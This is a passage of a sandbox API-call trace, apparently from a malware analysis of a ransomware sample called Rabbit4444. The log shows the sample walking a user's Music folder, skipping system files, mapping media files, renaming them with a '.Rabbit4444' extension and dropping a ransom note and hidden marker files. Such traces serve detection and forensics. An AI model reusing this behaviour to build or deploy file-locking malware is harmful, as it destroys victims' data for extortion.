ftLastWriteTime.dwHighDateTime=0x1d4ccbc, nFileSizeHigh=0x0, nFileSizeLow=0x96e8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hBfw7IT.m4a", cAlternateFileName="")) returned 1 [0049.002] lstrcmpiW (lpString1="hBfw7IT.m4a", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.002] lstrcmpiW (lpString1="hBfw7IT.m4a", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.002] lstrcmpiW (lpString1="hBfw7IT.m4a", lpString2="Rabbit4444.exe") returned -1 [0049.002] lstrcmpiW (lpString1="hBfw7IT.m4a", lpString2=".") returned 1 [0049.002] lstrcmpiW (lpString1="hBfw7IT.m4a", lpString2="..") returned 1 [0049.002] lstrcmpiW (lpString1="hBfw7IT.m4a", lpString2="windows") returned -1 [0049.002] lstrcmpiW (lpString1="hBfw7IT.m4a", lpString2="bootmgr") returned 1 [0049.002] lstrcmpiW (lpString1="hBfw7IT.m4a", lpString2="pagefile.sys") returned -1 [0049.002] lstrcmpiW (lpString1="hBfw7IT.m4a", lpString2="boot") returned 1 [0049.002] lstrcmpiW (lpString1="hBfw7IT.m4a", lpString2="ids.txt") returned -1 [0049.002] lstrcmpiW (lpString1="hBfw7IT.m4a", lpString2="NTUSER.DAT") returned -1 [0049.002] lstrcpyW (in: lpString1=0x130eb72, lpString2="hBfw7IT.m4a" | out: lpString1="hBfw7IT.m4a") returned="hBfw7IT.m4a" [0049.002] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\hBfw7IT.m4a", dwFileAttributes=0x0) returned 1 [0049.002] lstrlenW (lpString="hBfw7IT.m4a") returned 11 [0049.002] lstrlenW (lpString="Rabbit4444") returned 10 [0049.002] lstrcmpiW (lpString1="Bfw7IT.m4a", lpString2="Rabbit4444") returned -1 [0049.002] lstrlenW (lpString=".dll") returned 4 [0049.002] lstrcmpiW (lpString1=".m4a", lpString2=".dll") returned 1 [0049.003] lstrlenW (lpString=".lnk") returned 4 [0049.003] lstrcmpiW (lpString1=".m4a", lpString2=".lnk") returned 1 [0049.003] lstrlenW (lpString=".ini") returned 4 [0049.003] lstrcmpiW (lpString1=".m4a", lpString2=".ini") returned 1 [0049.003] lstrlenW (lpString=".sys") returned 4 [0049.003] lstrcmpiW (lpString1=".m4a", lpString2=".sys") returned -1 [0049.003] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\hBfw7IT.m4a" (normalized: "c:\\users\\fd1hvy\\music\\ps7z1y\\hbfw7it.m4a"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0049.003] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0049.003] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14031359961) returned 1 [0049.003] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=38632) returned 1 [0049.003] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117d10 [0049.003] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102260 [0049.003] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x99f0, lpName=0x0) returned 0x298 [0049.003] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x99f0) returned 0x70000 [0049.004] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0049.004] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0049.004] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0049.004] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0049.004] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0049.005] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0049.005] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0049.005] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0049.005] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14031543655) returned 1 [0049.005] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117d10 | out: hHeap=0xe0000) returned 1 [0049.005] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102260 | out: hHeap=0xe0000) returned 1 [0049.005] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0049.005] CloseHandle (hObject=0x298) returned 1 [0049.005] CloseHandle (hObject=0x278) returned 1 [0049.007] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\hBfw7IT.m4a.Rabbit4444") returned 51 [0049.007] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\hBfw7IT.m4a" (normalized: "c:\\users\\fd1hvy\\music\\ps7z1y\\hbfw7it.m4a"), lpNewFileName="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\hBfw7IT.m4a.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\music\\ps7z1y\\hbfw7it.m4a.rabbit4444"), dwFlags=0x1) returned 1 [0049.008] InterlockedExchangeAdd (in: Addend=0xff618, Value=38640 | out: Addend=0xff618) returned 19249536 [0049.008] InterlockedExchangeAdd (in: Addend=0xff624, Value=1 | out: Addend=0xff624) returned 3460 [0049.008] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf038a4e0, ftCreationTime.dwHighDateTime=0x1d4cf7e, ftLastAccessTime.dwLowDateTime=0xdaca3d00, ftLastAccessTime.dwHighDateTime=0x1d4d1c0, ftLastWriteTime.dwLowDateTime=0xdaca3d00, ftLastWriteTime.dwHighDateTime=0x1d4d1c0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Hg6ypigpHsR-XRiGigP", cAlternateFileName="HG6YPI~1")) returned 1 [0049.008] lstrcmpiW (lpString1="Hg6ypigpHsR-XRiGigP", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.008] lstrcmpiW (lpString1="Hg6ypigpHsR-XRiGigP", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.008] lstrcmpiW (lpString1="Hg6ypigpHsR-XRiGigP", lpString2="Rabbit4444.exe") returned -1 [0049.008] lstrcmpiW (lpString1="Hg6ypigpHsR-XRiGigP", lpString2=".") returned 1 [0049.008] lstrcmpiW (lpString1="Hg6ypigpHsR-XRiGigP", lpString2="..") returned 1 [0049.008] lstrcmpiW (lpString1="Hg6ypigpHsR-XRiGigP", lpString2="windows") returned -1 [0049.008] lstrcmpiW (lpString1="Hg6ypigpHsR-XRiGigP", lpString2="bootmgr") returned 1 [0049.008] lstrcmpiW (lpString1="Hg6ypigpHsR-XRiGigP", lpString2="pagefile.sys") returned -1 [0049.008] lstrcmpiW (lpString1="Hg6ypigpHsR-XRiGigP", lpString2="boot") returned 1 [0049.008] lstrcmpiW (lpString1="Hg6ypigpHsR-XRiGigP", lpString2="ids.txt") returned -1 [0049.008] lstrcmpiW (lpString1="Hg6ypigpHsR-XRiGigP", lpString2="NTUSER.DAT") returned -1 [0049.008] lstrcpyW (in: lpString1=0x130eb72, lpString2="Hg6ypigpHsR-XRiGigP" | out: lpString1="Hg6ypigpHsR-XRiGigP") returned="Hg6ypigpHsR-XRiGigP" [0049.008] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6448 [0049.008] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x62) returned 0xf1448 [0049.008] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6450 | out: ListHead=0xf68b0, ListEntry=0xf6450) returned 0xf63b0 [0049.008] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x53c0c7c0, ftCreationTime.dwHighDateTime=0x1d4cdd8, ftLastAccessTime.dwLowDateTime=0x43e93580, ftLastAccessTime.dwHighDateTime=0x1d4c699, ftLastWriteTime.dwLowDateTime=0x43e93580, ftLastWriteTime.dwHighDateTime=0x1d4c699, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="W29iTxeG", cAlternateFileName="")) returned 1 [0049.008] lstrcmpiW (lpString1="W29iTxeG", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0049.008] lstrcmpiW (lpString1="W29iTxeG", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.008] lstrcmpiW (lpString1="W29iTxeG", lpString2="Rabbit4444.exe") returned 1 [0049.008] lstrcmpiW (lpString1="W29iTxeG", lpString2=".") returned 1 [0049.008] lstrcmpiW (lpString1="W29iTxeG", lpString2="..") returned 1 [0049.008] lstrcmpiW (lpString1="W29iTxeG", lpString2="windows") returned -1 [0049.008] lstrcmpiW (lpString1="W29iTxeG", lpString2="bootmgr") returned 1 [0049.008] lstrcmpiW (lpString1="W29iTxeG", lpString2="pagefile.sys") returned 1 [0049.008] lstrcmpiW (lpString1="W29iTxeG", lpString2="boot") returned 1 [0049.008] lstrcmpiW (lpString1="W29iTxeG", lpString2="ids.txt") returned 1 [0049.009] lstrcmpiW (lpString1="W29iTxeG", lpString2="NTUSER.DAT") returned 1 [0049.009] lstrcpyW (in: lpString1=0x130eb72, lpString2="W29iTxeG" | out: lpString1="W29iTxeG") returned="W29iTxeG" [0049.009] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6488 [0049.009] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x4c) returned 0x10d3f8 [0049.009] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6490 | out: ListHead=0xf68b0, ListEntry=0xf6490) returned 0xf6450 [0049.009] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf044bbf0, ftCreationTime.dwHighDateTime=0x1d4c640, ftLastAccessTime.dwLowDateTime=0x3c597f30, ftLastAccessTime.dwHighDateTime=0x1d4d311, ftLastWriteTime.dwLowDateTime=0x3c597f30, ftLastWriteTime.dwHighDateTime=0x1d4d311, nFileSizeHigh=0x0, nFileSizeLow=0xd081, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="xS0okhLxs9IE8.m4a", cAlternateFileName="XS0OKH~1.M4A")) returned 1 [0049.009] lstrcmpiW (lpString1="xS0okhLxs9IE8.m4a", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0049.009] lstrcmpiW (lpString1="xS0okhLxs9IE8.m4a", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.009] lstrcmpiW (lpString1="xS0okhLxs9IE8.m4a", lpString2="Rabbit4444.exe") returned 1 [0049.009] lstrcmpiW (lpString1="xS0okhLxs9IE8.m4a", lpString2=".") returned 1 [0049.009] lstrcmpiW (lpString1="xS0okhLxs9IE8.m4a", lpString2="..") returned 1 [0049.009] lstrcmpiW (lpString1="xS0okhLxs9IE8.m4a", lpString2="windows") returned 1 [0049.009] lstrcmpiW (lpString1="xS0okhLxs9IE8.m4a", lpString2="bootmgr") returned 1 [0049.009] lstrcmpiW (lpString1="xS0okhLxs9IE8.m4a", lpString2="pagefile.sys") returned 1 [0049.009] lstrcmpiW (lpString1="xS0okhLxs9IE8.m4a", lpString2="boot") returned 1 [0049.009] lstrcmpiW (lpString1="xS0okhLxs9IE8.m4a", lpString2="ids.txt") returned 1 [0049.009] lstrcmpiW (lpString1="xS0okhLxs9IE8.m4a", lpString2="NTUSER.DAT") returned 1 [0049.009] lstrcpyW (in: lpString1=0x130eb72, lpString2="xS0okhLxs9IE8.m4a" | out: lpString1="xS0okhLxs9IE8.m4a") returned="xS0okhLxs9IE8.m4a" [0049.009] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\xS0okhLxs9IE8.m4a", dwFileAttributes=0x0) returned 1 [0049.009] lstrlenW (lpString="xS0okhLxs9IE8.m4a") returned 17 [0049.009] lstrlenW (lpString="Rabbit4444") returned 10 [0049.009] lstrcmpiW (lpString1="xs9IE8.m4a", lpString2="Rabbit4444") returned 1 [0049.009] lstrlenW (lpString=".dll") returned 4 [0049.009] lstrcmpiW (lpString1=".m4a", lpString2=".dll") returned 1 [0049.009] lstrlenW (lpString=".lnk") returned 4 [0049.009] lstrcmpiW (lpString1=".m4a", lpString2=".lnk") returned 1 [0049.009] lstrlenW (lpString=".ini") returned 4 [0049.010] lstrcmpiW (lpString1=".m4a", lpString2=".ini") returned 1 [0049.010] lstrlenW (lpString=".sys") returned 4 [0049.010] lstrcmpiW (lpString1=".m4a", lpString2=".sys") returned -1 [0049.010] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\xS0okhLxs9IE8.m4a" (normalized: "c:\\users\\fd1hvy\\music\\ps7z1y\\xs0okhlxs9ie8.m4a"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0049.010] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0049.010] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14032050781) returned 1 [0049.010] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=53377) returned 1 [0049.010] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0049.010] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101d98 [0049.010] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xd390, lpName=0x0) returned 0x298 [0049.010] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xd390) returned 0x70000 [0049.011] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0049.012] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0049.012] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0049.012] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0049.012] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0049.012] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0049.012] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0049.012] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0049.012] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14032270396) returned 1 [0049.012] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0049.012] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101d98 | out: hHeap=0xe0000) returned 1 [0049.012] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0049.013] CloseHandle (hObject=0x298) returned 1 [0049.013] CloseHandle (hObject=0x278) returned 1 [0049.015] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\xS0okhLxs9IE8.m4a.Rabbit4444") returned 57 [0049.015] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\xS0okhLxs9IE8.m4a" (normalized: "c:\\users\\fd1hvy\\music\\ps7z1y\\xs0okhlxs9ie8.m4a"), lpNewFileName="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\xS0okhLxs9IE8.m4a.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\music\\ps7z1y\\xs0okhlxs9ie8.m4a.rabbit4444"), dwFlags=0x1) returned 1 [0049.015] InterlockedExchangeAdd (in: Addend=0xff618, Value=53392 | out: Addend=0xff618) returned 19288176 [0049.015] InterlockedExchangeAdd (in: Addend=0xff624, Value=2 | out: Addend=0xff624) returned 3461 [0049.015] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf044bbf0, ftCreationTime.dwHighDateTime=0x1d4c640, ftLastAccessTime.dwLowDateTime=0x3c597f30, ftLastAccessTime.dwHighDateTime=0x1d4d311, ftLastWriteTime.dwLowDateTime=0x3c597f30, ftLastWriteTime.dwHighDateTime=0x1d4d311, nFileSizeHigh=0x0, nFileSizeLow=0xd081, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="xS0okhLxs9IE8.m4a", cAlternateFileName="XS0OKH~1.M4A")) returned 0 [0049.015] FindClose (in: hFindFile=0x102510 | out: hFindFile=0x102510) returned 1 [0049.015] lstrcpyW (in: lpString1=0x130eb72, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0049.015] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\music\\ps7z1y\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0049.016] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0049.016] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0049.018] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0049.018] CloseHandle (hObject=0x278) returned 1 [0049.018] CloseHandle (hObject=0x27c) returned 1 [0049.019] GetCurrentThreadId () returned 0xd98 [0049.019] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6490 [0049.019] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\W29iTxeG", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\W29iTxeG") returned="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\W29iTxeG" [0049.019] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10d3f8 | out: hHeap=0xe0000) returned 1 [0049.019] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6488 | out: hHeap=0xe0000) returned 1 [0049.019] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\W29iTxeG" | out: lpString1="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\W29iTxeG") returned="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\W29iTxeG" [0049.019] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\W29iTxeG", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\W29iTxeG\\") returned="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\W29iTxeG\\" [0049.019] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\W29iTxeG\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\W29iTxeG\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\W29iTxeG\\.BFC0E91B00AE8A0620D3" [0049.019] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\W29iTxeG\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\music\\ps7z1y\\w29itxeg\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0049.019] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0049.023] FlushFileBuffers (hFile=0x27c) returned 1 [0049.024] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\W29iTxeG\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0049.024] CloseHandle (hObject=0x27c) returned 1 [0049.025] lstrlenW (lpString="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\W29iTxeG") returned 37 [0049.025] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0049.025] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\W29iTxeG\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x53c0c7c0, ftCreationTime.dwHighDateTime=0x1d4cdd8, ftLastAccessTime.dwLowDateTime=0x43e93580, ftLastAccessTime.dwHighDateTime=0x1d4c699, ftLastWriteTime.dwLowDateTime=0xe68ad1e8, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102510 [0049.025] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.025] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0049.025] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0049.025] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0049.025] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x53c0c7c0, ftCreationTime.dwHighDateTime=0x1d4cdd8, ftLastAccessTime.dwLowDateTime=0x43e93580, ftLastAccessTime.dwHighDateTime=0x1d4c699, ftLastWriteTime.dwLowDateTime=0xe68ad1e8, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0049.025] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.025] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0049.025] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0049.025] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0049.025] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0049.025] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe68ad1e8, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe68ad1e8, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe68ad1e8, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0049.026] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.026] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0049.026] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac20e720, ftCreationTime.dwHighDateTime=0x1d4cb1b, ftLastAccessTime.dwLowDateTime=0x4d01e120, ftLastAccessTime.dwHighDateTime=0x1d4cd7a, ftLastWriteTime.dwLowDateTime=0x4d01e120, ftLastWriteTime.dwHighDateTime=0x1d4cd7a, nFileSizeHigh=0x0, nFileSizeLow=0xe9b1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BTTuE.wav", cAlternateFileName="")) returned 1 [0049.026] lstrcmpiW (lpString1="BTTuE.wav", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0049.026] lstrcmpiW (lpString1="BTTuE.wav", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0049.026] lstrcmpiW (lpString1="BTTuE.wav", lpString2="Rabbit4444.exe") returned -1 [0049.026] lstrcmpiW (lpString1="BTTuE.wav", lpString2=".") returned 1 [0049.026] lstrcmpiW (lpString1="BTTuE.wav", lpString2="..") returned 1 [0049.026] lstrcmpiW (lpString1="BTTuE.wav", lpString2="windows") returned -1 [0049.026] lstrcmpiW (lpString1="BTTuE.wav", lpString2="bootmgr") returned 1 [0049.026] lstrcmpiW (lpString1="BTTuE.wav", lpString2="pagefile.sys") returned -1 [0049.026] lstrcmpiW (lpString1="BTTuE.wav", lpString2="boot") returned 1 [0049.026] lstrcmpiW (lpString1="BTTuE.wav", lpString2="ids.txt") returned -1 [0049.026] lstrcmpiW (lpString1="BTTuE.wav", lpString2="NTUSER.DAT") returned -1 [0049.026] lstrcpyW (in: lpString1=0x130eb84, lpString2="BTTuE.wav" | out: lpString1="BTTuE.wav") returned="BTTuE.wav" [0049.026] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\W29iTxeG\\BTTuE.wav", dwFileAttributes=0x0) returned 1 [0049.026] lstrlenW (lpString="BTTuE.wav") returned 9 [0049.026] lstrlenW (lpString="Rabbit4444") returned 10 [0049.026] lstrcmpiW (lpString1="", lpString2="Rabbit4444") returned -1 [0049.026] lstrlenW (lpString=".dll") returned 4 [0049.026] lstrcmpiW (lpString1=".wav", lpString2=".dll") returned 1 [0049.026] lstrlenW (lpString=".lnk") returned 4 [0049.026] lstrcmpiW (lpString1=".wav", lpString2=".lnk") returned 1 [0049.026] lstrlenW (lpString=".ini") returned 4 [0049.026] lstrcmpiW (lpString1=".wav", lpString2=".ini") returned 1 [0049.026] lstrlenW (lpString=".sys") returned 4 [0049.026] lstrcmpiW (lpString1=".wav", lpString2=".sys") returned 1 [0049.026] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\Ps7z1Y\\W29iTxeG\\BTTuE.wav" (normalized: "c:\\users\\fd1hvy\\music\\ps7z1y\\w29itxeg\\bttue.wav"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0049.027] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0049.027] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14033738956) returned 1 [0049.027] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=59825) returned 1 [0049.027] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117d10 [0049.027] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101f30 [0049.027] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xecc0, lpName=0x0) returned 0x298 [0049.027] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, 